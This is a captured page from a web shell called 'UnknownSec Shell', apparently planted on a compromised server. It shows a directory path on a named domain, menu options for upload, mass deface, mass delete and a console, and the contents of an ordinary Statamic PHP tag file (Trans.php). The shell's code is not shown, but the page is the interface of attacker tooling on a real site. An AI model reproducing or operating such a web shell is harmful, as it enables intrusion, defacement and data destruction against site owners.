shell bypass 403
UnknownSec Shell
:
/
home
/
forge
/
lolas.brannanatkinson.com
/
vendor
/
statamic
/
cms
/
src
/
Tags
/ [
drwxrwxr-x
]
upload
mass deface
mass delete
console
info server
name :
Trans.php
<?php namespace Statamic\Tags; class Trans extends Tags { /** * The {{ trans }} tag. * * @return string */ public function wildcard($tag) { $key = $this->params->get('key', $tag); $locale = $this->params->pull('locale') ?? $this->params->pull('site'); $params = $this->params->all(); return __($key, $params, $locale); } }
© 2026 UnknownSec